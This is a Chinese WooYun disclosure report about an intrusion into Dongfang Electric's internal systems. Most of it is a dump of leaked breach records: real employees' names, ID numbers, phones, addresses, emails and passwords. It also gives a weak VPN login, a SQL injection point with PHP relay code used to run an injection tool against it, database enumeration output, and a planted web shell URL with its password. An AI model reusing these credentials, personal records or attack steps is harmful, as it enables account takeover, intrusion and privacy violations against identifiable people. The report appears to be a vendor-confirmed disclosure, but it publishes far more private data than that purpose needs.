漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-043947
漏洞标题:东方电气内网系统漫游记
相关厂商:dongfang.com
漏洞作者: 浩天
提交时间:2013-11-25 10:02
修复时间:2014-01-09 10:03
公开时间:2014-01-09 10:03
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-25: 细节已通知厂商并且等待厂商处理中
2013-11-25: 厂商已经确认,细节仅向厂商公开
2013-12-05: 细节向核心白帽子及相关领域专家公开
2013-12-15: 细节向普通白帽子公开
2013-12-25: 细节向实习白帽子公开
2014-01-09: 细节向公众公开
简要描述:
一次点到为止的内部系统漫游,提交的漏洞,不暴库、不传shell,不代表不严重
之前提了3个,一共到手才5RANK,好低廉,这个就算给20,也就到手4~5RANK
哎,东方电气怎么能算小厂商呢,比我们公司人多多了
说明:社工+Strust漏洞+RTX登录+SQL中转注入+VPN等各种系统漫游
详细说明:
目录:
1、社工获取大量员工账号、破弱口令
2、vpn的登录
3、多个内部系统的漫游
4、某系统另类sql注入,中转方法可破
5、struts漏洞拿administrator的shell
6、总结
1、先说社工吧:弱口令太多,有账号就OK,拿公司邮箱注册私人账号,是很可怕的事
来自[kaifang600W-800W.csv]
内容: 胥波,,,ID,510723198204101815,M,19820410,成都市成华区东风路18号,,F,,CHN,51,510723,,,,,,13648068596,13648068596,,[email protected],汉,,,,,,,0,2012-10-11 2:31:53,6867330
来自[kaifang600W-800W.csv]
内容: 李莎莎,,,ID,510602198411116828,F,19841111,成都市金牛区蜀汉路333
号,,F,,CHN,51,5101,,,,,,15884528382,15884528382,,[email protected],汉,,,,,,,0,2012-10-11 2:31:46,6876584
来自[kaifang600W-800W.csv]
内容: 计海,,,ID,510602197004016657,M,19700401,成都市青羊区瑞联路66号1栋1单元口01
号,,F,,CHN,51,5101,,,,,,15982820175,15982820175,,[email protected],汉,,,,,,,0,2011-5-18 9:32:40,7650814
来自[kaifang600W-800W.csv]
内容: 徐正华,,,ID,510602196201266992,M,19620126,四川省德阳市旌阳区樱花巷10号19幢48
号,,F,,CHN,51,5101,,,,,,15982820175,15982820175,,[email protected],汉,,,,,,,0,2011-5-18 12:02:54,7651223
来自[kaifang600W-800W.csv]
内容: 王强,,,ID,412702198104170061,M,19810417,成都市金牛区蜀汉路333
号,,F,,CHN,41,4101,,,,,,,13778202793,,[email protected],,,,,,,,0,2011-5-18 12:03:32,7651226
来自[kaifang1-200W.csv]
内容: 张晓冰,,,ID,510102195708040042,M,19570804,-,-, ,,CHN,-1,-1,,,,,,13678092754,-,-,[email protected],,,,,,,,0,2010-9-23
8:34:15,380047
来自[kaifang1-200W.csv]
内容: 尹艳梅,,,ID,510602196806266688,M,19680626,-,-,,,CHN,-1,-1,,,,,,15928810960,-,-,[email protected],,,,,,,,,,483059
来自[kaifang1-200W.csv]
内容: 尹东,,,ID,510302197003091050,M,19700309,-,-,,,CHN,-1,-1,,,,,,13908188800,-,-,[email protected],,,,,,,,,,548840
来自[kaifang1-200W.csv]
内容: 高丽娥,,,ID,510602197212287005,F,19721228,-,-, ,,CHN,-1,-1,,,,,,15982037273,-,-,[email protected],,,,,,,,0,2012-1-29
13:35:11,637259
来自[weibo.com_12160.txt]
内容: [email protected] 4004
来自[dodonew.com.txt]
内容: zhao445287961 [email protected] z4757325
来自[dodonew.com.txt]
内容: zhao4757325 [email protected] 4757325
来自[dodonew.com.txt]
内容: jacklm001 [email protected] 4004
来自[51cto.txt]
内容: marven8888 f0b6edb61b13f0675655cb4c3ce25218 [email protected]
来自[51cto.txt]
内容: qinzhimin 37d8408d8903776a847d5026b7599849 [email protected]
来自[renren.com.txt]
内容: [email protected] 4004
来自[mop.com.txt]
内容: [email protected] df8080
来自[766.com_20110908.txt]
内容: ���� 004004 [email protected]
来自[52pk.com_1717-2.txt]
内容: [email protected] 12345678
来自[dangdang.txt]
内容: 1462514 刘定邦 13980722712 [email protected]
来自[dangdang.txt]
内容: 1626007 徐麦英 13115577914 [email protected]
来自[dangdang.txt]
内容: 1626320 夏爱丽 [email protected]
来自[dangdang.txt]
内容: 2433568 雷宇 13541374177 [email protected]
来自[dangdang.txt]
内容: 2433612 雷宇 13541374177 [email protected]
来自[dangdang.txt]
内容: 3535985 肖漫 13688354650 [email protected]
来自[dangdang.txt]
内容: 3744205 傅海波 13908052131 [email protected]
来自[dangdang.txt]
内容: 4032087 傅海波 13908052131 [email protected]
来自[dangdang.txt]
内容: 4106710 雷宇 13541374177 [email protected]
来自[dangdang.txt]
内容: 4271041 傅海波 13908052131 [email protected]
来自[dangdang.txt]
内容: 5938535 穆梅 13980016127 [email protected]
来自[dangdang.txt]
内容: 6598156 穆梅 13980016127 [email protected]
来自[dangdang.txt]
内容: 6690409 肖漫 13688354650 [email protected]
来自[dangdang.txt]
内容: 7035502 唐海静 13666117372 [email protected]
来自[dangdang.txt]
内容: 7381974 胡琦宇 13880929954 [email protected]
来自[dangdang.txt]
内容: 8102969 肖漫 13688354650 [email protected]
来自[dangdang.txt]
内容: 8141517 黄颉 13981817336 [email protected]
来自[dangdang.txt]
内容: 8384938 杨丽君 13808050168 [email protected]
来自[dangdang.txt]
内容: 8578435 肖漫 13688354650 [email protected]
来自[dangdang.txt]
内容: 8720960 黄颉 13981817336 [email protected]
来自[dangdang.txt]
内容: 9055606 肖漫 13688354650 [email protected]
来自[dangdang.txt]
内容: 9608185 肖漫 13688354650 [email protected]
来自[dangdang.txt]
内容: 9720290 李滨菲 13981918806 [email protected]
来自[dangdang.txt]
内容: 9808853 王爱庆 13980991925 [email protected]
来自[dangdang.txt]
内容: 10639615 穆梅 13980016127 [email protected]
来自[dangdang.txt]
内容: 10663381 傅海波 13908052131 [email protected]
来自[dangdang.txt]
内容: 11211254 刘定邦 13980722712 [email protected]
来自[dangdang.txt]
内容: 12313344 姜丽娜 13541236903 [email protected]
来自[dangdang.txt]
内容: 12349089 穆梅 13980016127 [email protected]
来自[dangdang.txt]
内容: 12439736 傅海波 13908052131 [email protected]
来自[dangdang.txt]
内容: 12849003 李滨菲 13981918806 [email protected]
来自[csdn.net.txt]
内容: guozhengrong # 19700106 # [email protected]
来自[csdn.net.txt]
内容: decljq # LIUJQ680518 # [email protected]
来自[csdn.net.txt]
内容: Richard_lwh # l810218wh # [email protected]
来自[csdn.net.txt]
内容: jacklm001 # 19780913 # [email protected]
来自[csdn.net.txt]
内容: hailiangjin # haiti1983 # [email protected]
来自[csdn.net.txt]
内容: jiangzhoudongfang # welcome1 # [email protected]
来自[csdn.net.txt]
内容: nlwjxq # 203717jjaigg # [email protected]
来自[csdn.net.txt]
内容: hawkcym # shmzhr2010 # [email protected]
来自[csdn.net.txt]
内容: yangyang4910 # 052785882446 # [email protected]
来自[csdn.net.txt]
内容: daniellexd # 102007xudan4211 # [email protected]
来自[163-9.txt]
内容: [email protected]@163.com----12345678
来自[kaifang1800w-2000w.csv]
内容: 陈亮,,,ID,512528197410265130,,,,,,,,,,,,,,,13558659266,,,[email protected],,,,,,,,0,2012-11-20 13:53:44,19105720
来自[changgui.txt]
内容: sczhangyunyan 张云燕 13219065856 1486efcca212f972 [email protected] tpy100.com
来自[changgui.txt]
内容: dongfangjulong 孔丽 ee5274c3cc852be64310d60b307f643a [email protected] 123ik.com
来自[changgui.txt]
内容: qinzhimin5487 qinzhimin5487 [email protected]
来自[changgui.txt]
内容: newhandppp 123456sbh [email protected]
来自[changgui.txt]
内容: oldhouse oldhouse1 [email protected]
来自[changgui.txt]
内容: newhandppp 123456sbh [email protected]
来自[changgui.txt]
内容: oldhouse oldhouse1 [email protected]
来自[changgui.txt]
内容: 明无敌 004004 [email protected]
来自[changgui.txt]
内容: 东方页游公会 dongfang521 [email protected]
来自[changgui.txt]
内容: houzx 123456 [email protected]
来自[changgui.txt]
内容: xuwm 123456 [email protected]
来自[changgui.txt]
内容: xuwm 123456 [email protected]
来自[changgui.txt]
内容: df8080 [email protected]
来自[changgui.txt]
内容: 43240000677 刘克海 15228981279 lkh1028 0000 [email protected]
来自[changgui.txt]
内容: 43800017439 王一帆 13808009415 wyf630 106267200505100338 [email protected]
来自[changgui.txt]
内容: 43030020515 李红兵 13881765877 3351898 00785106 [email protected]
来自[changgui.txt]
内容: 43740032955 付哲 13518171083 dec2006 106511200605214303 [email protected]
来自[changgui.txt]
内容: 43480055098 李宏菁 15982822531 lihj740531 97807431 [email protected]
来自[changgui.txt]
内容: liuhongzhi001 840405 [email protected]
来自[shenfen.txt]
内容: CYSQHX17348 49ba59abbe56e057 [email protected] 张文涛 440104195806260414 13902226113
来自[shenfen.txt]
内容: sczhangyunyan 1486efcca212f972 [email protected] 张云燕 510602196802087009 13219065856
来自[52pk.com_COC-3.txt]
内容: ���� 004004 [email protected]
来自[52pk.com_COC-3.txt]
内容: ����ҳ�ι��� 4185493a9dd2d00769f6f3ffb9b48328 [email protected] dongfang521
来自[tianya.txt]
内容: chencf1984 183600 [email protected]
来自[tianya.txt]
内容: Share_love tonycheng123 [email protected]
来自[tianya.txt]
内容: 键盘下的灵魂 dubofq77 [email protected]
来自[tianya.txt]
内容: 东方少个肺 yanglife [email protected]
来自[tianya.txt]
内容: rapitwater 19831209 [email protected]
来自[tianya.txt]
内容: 四川蓬溪人 87583099 [email protected]
来自[tianya.txt]
内容: DECJINJING 721026 [email protected]
来自[tianya.txt]
内容: DECJINJING1972 721026 [email protected]
来自[tianya.txt]
内容: 闪靓的浑珠 kangfjp6778 [email protected]
来自[tianya.txt]
内容: 找不到工作没饭吃 998124 [email protected]
来自[tianya.txt]
内容: jacklm001 004004 [email protected]
来自[tianya.txt]
内容: lee132 58368062 [email protected]
来自[tianya.txt]
内容: liuyuanzhang 621212 [email protected]
来自[tianya.txt]
内容: jeady39 a039530a [email protected]
来自[tianya.txt]
内容: 猪宝贝爱宝贝猪 123456 [email protected]
来自[tianya.txt]
内容: abandonyoursoul ssshhh815311 [email protected]
来自[tianya.txt]
内容: hdzg 01010805 [email protected]
来自[tianya.txt]
内容: teddy好心情 123456 [email protected]
来自[tianya.txt]
内容: 土豆456 77577615 [email protected]
来自[tianya.txt]
内容: wgangg hello0 [email protected]
来自[tianya.txt]
内容: 掌心55 wanggangok [email protected]
来自[tianya.txt]
内容: wpwpwp2009 wpwpwp2008 [email protected]
来自[tianya.txt]
内容: Daniellexd 102007 [email protected]
来自[tianya.txt]
内容: yangyangIloveyou zxcvbnm [email protected]
来自[tianya.txt]
内容: 悠悠tracy 620710303 [email protected]
来自[tianya.txt]
内容: 飞利浦去死 225112 [email protected]
来自[tianya.txt]
内容: hh6hf zwqt666 [email protected]
来自[tianya.txt]
内容: 上善若水_200903 adminstor0369 [email protected]
来自[52pk.com_1717-1.txt]
内容: [email protected] df8080
来自[52pk.com_1717-1.txt]
内容: [email protected] 66676869wdw
来自[uuu9.com.txt]
内容: ����ҳ�ι��� 4185493a9dd2d00769f6f3ffb9b48328 [email protected] dongfang521
来自[aipai.com_1-20W (16).txt]
内容: ����ҳ�ι��� 4185493a9dd2d00769f6f3ffb9b48328 [email protected]
来自[other8.txt]
内容: jacklm001 [email protected] 4004
来自[kaifang1000W-1200W.csv]
内容: 韩凤文,,,ID,370784198701032538,M,19870103,成都市金牛区蜀汉路333
号,,,,CHN,37,370784,,,,,,15982820175,15982820175,,[email protected],,,,,,,,0,2011-12-24 6:43:46,11708781
来自[kaifang1000W-1200W.csv]
内容 吴国伟,,,ID,513029197303021018,,19730302,,,,,,,,,,,,,13648097399,,,[email protected],,,,,,,,,,11766554
来自[52pk.com_SN3.txt]
内容: newhandppp 123456sbh [email protected]
来自[52pk.com_SN3.txt]
内容: oldhouse oldhouse1 [email protected]
来自[kaifang400W-600W.csv]
内容: 孔卫,,,ID,412702198104170051,M,19810417,成都市金牛区蜀汉路333
号,,F,,CHN,41,4101,,,,,,15982820175,15982820175,,[email protected],,,,,,,,0,2012-12-6 8:28:50,4815395
来自[aipai.com_1-20W (10).txt]
内容: ���� 25bfc0fa206722704da7bd56a78779d7 [email protected]
来自[52pk.com_KTCY.txt]
内容: Daniellexd,102007,[email protected]
来自[52pk.com_KTCY.txt]
内容: �����ٸ���,yanglife,[email protected]
来自[52pk.com_KTCY.txt]
内容: DECJINJING 721026 [email protected]
来自[52pk.com_KTCY.txt]
内容: DECJINJING1972 721026 [email protected]
来自[52pk.com_KTCY.txt]
内容: chencf1984,183600,[email protected]
来自[52pk.com_KTCY.txt]
内容: lee132,58368062,[email protected]
来自[52pk.com_KTCY.txt]
内容: �����Ļ���,kangfjp6778,[email protected]
来自[52pk.com_KTCY.txt]
内容: hh6hf,zwqt666,[email protected]
来自[52pk.com_KTCY.txt]
内容: ������ȥ�� ,225112,[email protected]
来自[52pk.com_KTCY.txt]
内容: jeady39,a039530a,[email protected]
来自[52pk.com_KTCY.txt]
内容: �Ĵ���Ϫ��,87583099,[email protected]
来自[52pk.com_KTCY.txt]
内容: �Ҳ�������û����,998124,[email protected]
来自[52pk.com_KTCY.txt]
内容: ����456,77577615,[email protected]
来自[52pk.com_SN2.txt]
内容: ������ȥ�� ,225112,[email protected]
来自[52pk.com_SN2.txt]
内容: jeady39,a039530a,[email protected]
来自[7K7K_16-20.txt]
内容: [email protected],77577615
来自[huatu_uc_members.txt]
内容: houzerong 6b027673eb8ea9a9d618f6a155396fba [email protected] 976419
来自[ispeak.txt]
内容: Daniellexd,102007,[email protected]
来自[ispeak.txt]
内容: �����ٸ���,yanglife,[email protected]
来自[ispeak.txt]
内容: [email protected]
来自[ispeak.txt]
内容: [email protected]
来自[ispeak.txt]
内容: chencf1984,183600,[email protected]
来自[ispeak.txt]
内容: lee132,58368062,[email protected]
来自[ispeak.txt]
内容: �����Ļ���,kangfjp6778,[email protected]
来自[ispeak.txt]
内容: hh6hf,zwqt666,[email protected]
来自[ispeak.txt]
内容: ������ȥ��,225112,[email protected]
来自[ispeak.txt]
内容: jeady39,a039530a,[email protected]
来自[ispeak.txt]
内容: �Ĵ���Ϫ��,87583099,[email protected]
来自[ispeak.txt]
内容: �Ҳ�������û����,998124,[email protected]
来自[ispeak.txt]
内容: ����456,77577615,[email protected]
来自[7K7K_11-15.txt]
内容: [email protected],225112
来自[7K7K_11-15.txt]
内容: [email protected],a039530a
来自[7K7K_11-15.txt]
内容: [email protected],87583099
来自[7K7K_11-15.txt]
内容: [email protected],998124
来自[kaifang1200W-1400W.csv]
内容: 聂学青,,,ID,510302197106021055,M,19710602,,,,,,,,,,,,,13808187880,,,[email protected],,,,,,,,,2012-4-9 19:54:38,13538793
来自[kaifang1200W-1400W.csv]
内容: 肖飞,,,ID,513401198008110210,M,19800811,,,,,,,,,,,,,,,,[email protected],,,,,,,,,2012-4-9 19:54:38,13666726
来自[7K7K_6-10.txt]
内容: [email protected],4004
来自[52pk.com_SN1.txt]
内容: qinzhimin5487 qinzhimin5487 [email protected]
来自[52pk.com_SN1.txt]
内容: newhandppp 123456sbh [email protected]
来自[52pk.com_SN1.txt]
内容: oldhouse oldhouse1 [email protected]
漏洞证明:
2、东方电气的vpn很牛叉:
https://vpn.dongfang.com/
举例来个弱口令的账号:
账号:zhangxr
密码:12345678
跟这妹子没啥关系,其他账号弱口令的也多的是,原谅她吧,我也没干啥,转了一大圈,也原谅我吧
3、因为VPN的存在,其他系统就都能访问了
a、东方电气办公门户:
http://portal.dongfang.com
RTX能登录,集团组织架构一目了然,可以与总经理亲切交谈了
b、OA、Mail系统就都OK了:
OA系统:
http://oa.dongfang.com/
邮件系统:
http://oamail.dongfang.com
c、东风电机KOA系统:
http://dfdjoa.dongfang.com
d、综合管理信息系统:
http://cmis.dongfang.com
4、cmis系统sql注入
http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=410065529-ablename=CMIS_QUALITY_CUL_EXP
注入点:id=
http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=410065529 and 1=1-ablename=CMIS_QUALITY_CUL_EXP
有东西
http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=410065529 and 1=2-ablename=CMIS_QUALITY_CUL_EXP
工具不能直接用,分析了下,参数不是使用“&”连接的,用的“-”,因为“-”与注释符相撞,没法破,工具又不能用,想了一下,用中转吧,代码如下:
inj.php文件:
<?php
set_time_limit(0);
$id=$_GET["id"];
echo $id;
$id=str_replace(" ","%20",$id);
$id=str_replace("=","%3D",$id);
$url = "http://cmis.dongfang.com/jfids/data/indexNewsContent.svt?id=$id-ablename=CMIS_QUALITY_CUL_EXP";
echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>
新的注入点:
http://192.168.0.1/inj.php?id=410065529
在用工具跑,只跑了库名、和cmis库结构,没跑数据:
available databases [16]:
[*] CMIS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: CMIS
[230 tables]
+--------------------------------+
| CMIS_DECMAGAZINE |
| CMIS_DONGDIAN_NCR |
| CMIS_DONGFENG_NCR |
| CMIS_DONGFENG_NCRCLASSTYPE |
| CMIS_DONGFENG_NCR_MEASURE |
| CMIS_DONGGUO_NCR |
| CMIS_DONGZHONG_NCR |
| CMIS_ENTERPRISE_MEMO |
| CMIS_EXP_NEWSPICLIST |
| CMIS_FEEDBACK |
| CMIS_FILECORPUS_FILEPURVIEW |
| CMIS_FILECORPUS_REPORT |
| CMIS_FILECORPUS_REPORTPURVIEW |
| CMIS_FILECORPUS_SYSFILE |
| CMIS_FILECORPUS_SYSFILESTATE |
| CMIS_FILECORPUS_SYSFILETYPE |
| CMIS_FILEREPORT_ATTACHMENT |
| CMIS_JD |
| CMIS_JZDB_ATTACH |
| CMIS_JZDB_JZDBINFO |
| CMIS_JZDB_JZDBINFOATTACH |
| CMIS_JZDB_PROBLEM |
| CMIS_MAGAZINE_ATTACHMENT |
| CMIS_MEETING |
| CMIS_MEETINGMINUTES |
| CMIS_MEETINGMINUTESTYPE |
| CMIS_MEETINGROOM |
| CMIS_MEETING_ATTACHMENT |
| CMIS_MEETING_DENSE |
| CMIS_MEETING_EMP |
| CMIS_MEETING_PURVIEW |
| CMIS_MONTH |
| CMIS_NCR_ATTACHMENT |
| CMIS_NCR_DISTRIBUTION |
| CMIS_NCR_PROCESS |
| CMIS_NCR_UNIT |
| CMIS_NOTICE_NEWS |
| CMIS_NOTICE_NEWSADV |
| CMIS_NOTICE_NEWSGRADE |
| CMIS_NOTICE_NEWSIMPORT |
| CMIS_NOTICE_NEWSPICLIST |
| CMIS_NOTICE_NEWSSTATE |
| CMIS_NOTICE_NEWSTEMP |
| CMIS_NOTICE_NEWSTYPE |
| CMIS_OPERATOR_LOG |
| CMIS_PERSONAL_RECCEREMONY |
| CMIS_PERSONAL_RECEPTIONBASE |
| CMIS_PERSONAL_RECGUESTLIST |
| CMIS_PERSONAL_RECHOTEL |
| CMIS_PERSONAL_RECINSPECT |
| CMIS_PERSONAL_RECMEAL |
| CMIS_PERSONAL_RECMEETING |
| CMIS_PERSONAL_RECPICKUP |
| CMIS_PERSONAL_RECSEEOFF |
| CMIS_PERSONAL_RECTOURISM |
| CMIS_QUALITY_COMMONTASK |
| CMIS_QUALITY_COMMONTASKVERIFY |
| CMIS_QUALITY_CTASKTYPE |
| CMIS_QUALITY_CTEXE |
| CMIS_QUALITY_CTSTATE |
| CMIS_QUALITY_CUL_EXP |
| CMIS_QUALITY_CUL_EXP_EQ |
| CMIS_QUALITY_CUL_NEWS |
| CMIS_QUALITY_CUL_NEWSADV |
| CMIS_QUALITY_CUL_NEWSGRADE |
| CMIS_QUALITY_CUL_NEWSIMPORT |
| CMIS_QUALITY_CUL_NEWSPICLIST |
| CMIS_QUALITY_CUL_NEWSSTATE |
| CMIS_QUALITY_CUL_NEWSTEMP |
| CMIS_QUALITY_CUL_NEWSTYPE |
| CMIS_QUALITY_CUL_VISION |
| CMIS_QUALITY_DEPCODE |
| CMIS_QUALITY_EXTERNAL |
| CMIS_QUALITY_EXTERNAL_PICLIST |
| CMIS_QUALITY_GOALMEASUREFILE |
| CMIS_QUALITY_GOAL_GOALBASE |
| CMIS_QUALITY_GOAL_GOALMEASURE |
| CMIS_QUALITY_GOAL_GOALSTATE |
| CMIS_QUALITY_GOAL_GOALTRAD |
| CMIS_QUALITY_GOAL_MEAIMPLE |
| CMIS_QUALITY_GOAL_MEASURESTATE |
| CMIS_QUALITY_LOSS |
| CMIS_QUALITY_MA_DISPO |
| CMIS_QUALITY_MA_REPORT |
| CMIS_QUALITY_MA_REPORT_PICLIST |
| CMIS_QUALITY_PLANMEASUREFILE |
| CMIS_QUALITY_PLAN_MEAIMPLE |
| CMIS_QUALITY_PLAN_MEASURESTATE |
| CMIS_QUALITY_PLAN_PLANBASE |
| CMIS_QUALITY_PLAN_PLANMEASURE |
| CMIS_QUALITY_PLAN_PLANSTATE |
| CMIS_QUALITY_PLAN_PLANTRAC |
| CMIS_QUALITY_QC_BASE |
| CMIS_QUALITY_QC_STATE |
| CMIS_QUALITY_QC_TRAD |
| CMIS_QUALITY_REASONTYPE |
| CMIS_QUALITY_REMINDERNCR |
| CMIS_QUALITY_REMINDERPRESS |
| CMIS_QUALITY_SUPPLIERS |
| CMIS_REASONTYPE |
| CMIS_SUPERVISION_ADDCOLUMNS |
| CMIS_SUPPLIERS_LEVEL |
| CMIS_SUPPLIERS_LEVEL_L |
| CMIS_SUPPLIERS_TYPE |
| CMIS_SYSFILE_ATTACHMENT |
| CMIS_TASKLIST_LIST |
| CMIS_TASKLIST_WAIT |
| CMIS_XXHYJS_PROJECT |
| CMIS_XXHYJS_TASK |
| CMIS_XXHYJS_TASKACTION |
| CMIS_XXHYJS_TASKATION_ATTACH |
| CMIS_XXHYJS_TASKDISTRIBUTION |
| CMIS_XXHYJS_TASK_STATE |
| DEC_TREE |
| DEMO_AMD |
| DEMO_CHART |
| DEMO_CODE |
| DEMO_DEC |
| DEMO_GROUP |
| DEMO_LIST1 |
| DEMO_REPORT_CHART |
| DEMO_REPORT_HUMAN |
| DEMO_REPORT_LIST |
| DEMO_TREE |
| DMETE_CODE_CITY |
| DMETE_CODE_COUNTY |
| DMETE_CODE_DISTRICT |
| DMETE_CODE_STATION |
| DMETE_FACTORS |
| DOC_ATTACHMENT |
| DOC_SHARED |
| DOC_SHARED_STATE |
| DOC_SHARED_TYPE |
| HIBERNATE_SEQUENCES |
| JBPM4_AGENT |
| JBPM4_DEPLOYMENT |
| JBPM4_DEPLOYPROP |
| JBPM4_EXECUTION |
| JBPM4_HIST_ACTINST |
| JBPM4_HIST_DETAIL |
| JBPM4_HIST_PROCINST |
| JBPM4_HIST_TASK |
| JBPM4_HIST_VAR |
| JBPM4_ID_GROUP |
| JBPM4_ID_MEMBERSHIP |
| JBPM4_ID_USER |
| JBPM4_JOB |
| JBPM4_LOB |
| JBPM4_PARTICIPATION |
| JBPM4_PROPERTY |
| JBPM4_SWIMLANE |
| JBPM4_TASK |
| JBPM4_VARIABLE |
| KOA_FINISHDOC |
| LIS_IMPORT_USER |
| SSPE_ARCHIVES |
| SSPE_ARCHIVES_DEP |
| SSPE_ARCHIVES_DOC |
| SSPE_ARCH_DISPATCH |
| SSPE_DEP_USERS |
| SSPE_DICTIONARY |
| SSPE_DOC_HISTORY |
| SSPE_FILE_ATTACH |
| SSPE_JOB |
| SSPE_PAINT_TEMPLATE |
| SSPE_PRO_AGENT |
| SSPE_RELATIVE_JOB |
| SSPE_RELATIVE_USER |
| SSPE_SEAL |
| SSPE_USER_JOB |
| SYSTEMFEEDBACK |
| TBE_EMPDEPART |
| TBE_EMPDEPART_BACK |
| TBE_EMPINFO |
| TBE_EMPINFO_BACK |
| TC_CMIS_XXHYJS_EVALUATE |
| TC_CMIS_XXHYJS_EVALUATESELF |
| TC_CMIS_XXHYJS_TASKACTION |
| TC_CMIS_XXHYJS_TASKTYPE |
| TC_SEX |
| TS_DEPARTMENT |
| TS_DEPARTMENT_BACK |
| TS_DEPARTPURVIEW |
| TS_MODEL |
| TS_MODEL_TYPE |
| TS_PURVIEW |
| TS_ROLE |
| TS_ROLEPURVIEW |
| TS_ROLETYPE |
| TS_USER |
| TS_USERPURVIEW |
| TS_USERPURVIEW_BACK |
| TS_USERROLE |
| TS_USER_BACK |
| UIAS_BSYSTEM |
| UIAS_DBC |
| UIAS_DEPARTMENT |
| UIAS_DEP_BSYSTEM |
| UIAS_DEP_TEST |
| UIAS_DFHM |
| UIAS_EMPLOYEE |
| UIAS_EMPLOYEE_OTHERDEP |
| UIAS_GROUP |
| UIAS_GROUP_EMPLOYEE |
| UIAS_IMPORT_USER |
| UIAS_MANAGEDEP |
| UIAS_RTXUSERINFO |
| WPS_CUSTOM_FIELD_RIGHTS |
| WPS_DEPARTMENT |
| WPS_FIELD_RIGHTS |
| WPS_FILE_ATTACH |
| WPS_FORM_DEF |
| WPS_FORM_DEF_MAPPING |
| WPS_FORM_FIELD |
| WPS_FORM_TABLE |
| WPS_FORM_TEMPLATE |
| WPS_GLOBAL_TYPE |
| WPS_PROCESS_FORM |
| WPS_PROCESS_RUN |
| WPS_PRODEFTYPE_TREE |
| WPS_PRO_DEFINITION |
| WPS_PRO_DEF_RIGHTS |
| WPS_PRO_HANDLE_COMP |
| WPS_PRO_USER_ASSIGN |
| WPS_RUN_DATA |
| WPS_SYS_ROLE |
| WPS_SYS_USER |
| WPS_TASK_SIGN |
| WPS_TASK_SIGN_DATA |
| WPS_USER_ROLE |
+--------------------------------+
5、portal系统struts漏洞;
这回传shell了,可继续渗透内网,但是没有,点到为止了,严重程度证明如图:
http://portal.dongfang.com/decpro/decsys.jsp 密码:123123
修复方案:
6、总结:
a、强制员工密码强度,别用默认密码、弱密码
b、一般都不敢把vpn这么直接的放在外面
c、我也不知道了,其实内部系还有好多其他问题,挺多的
d、检测就到shell为止,请勿跨省、请喝茶,啥都没干,友情测试
e、我是好人,剑心证明
版权声明:转载请注明来源 浩天@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-11-25 12:52
厂商回复:
谢谢通知我们
最新状态:
暂无